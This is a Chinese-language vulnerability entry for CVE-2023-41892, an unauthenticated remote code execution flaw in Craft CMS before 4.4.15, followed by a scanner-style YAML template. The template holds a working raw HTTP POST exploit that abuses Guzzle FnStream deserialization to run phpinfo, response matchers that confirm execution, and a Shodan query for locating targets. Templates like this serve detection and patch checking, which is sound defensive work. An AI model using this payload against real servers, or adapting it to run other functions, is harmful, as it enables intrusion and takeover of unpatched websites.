漏洞描述
Craft CMS是一个创造数字体验的平台。这是一个高影响、低复杂度的攻击向量。鼓励在4.4.15之前运行Craft安装的用户至少更新到该版本,以缓解问题。该问题已在Craft CMS 4.4.15中修复。
影响版本
Craft CMS >= 4.0.0-RC1
Craft CMS <= 4.4.14
POC
id: CVE-2023-41892
info:
name: CraftCMS < 4.4.15 - Unauthenticated Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.
reference:
- https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g
- https://blog.calif.io/p/craftcms-rce
- https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#4415---2023-07-03-critical
- https://github.com/craftcms/cms/commit/7359d18d46389ffac86c2af1e0cd59e37c298857
- https://github.com/craftcms/cms/commit/a270b928f3d34ad3bd953b81c304424edd57355e
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L
cvss-score: 10
cve-id: CVE-2023-41892
cwe-id: CWE-94
epss-score: 0.00044
epss-percentile: 0.08209
metadata:
max-request: 1
verified: true
publicwww-query: "craftcms"
shodan-query: http.favicon.hash:-47932290
tags: cve,cve2023,rce,unauth,craftcms
http:
- raw:
- |
POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream", "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}
matchers:
- type: word
words:
- "PHP Credits"
- "PHP Group"
- "CraftCMS"
condition: and
case-insensitive: true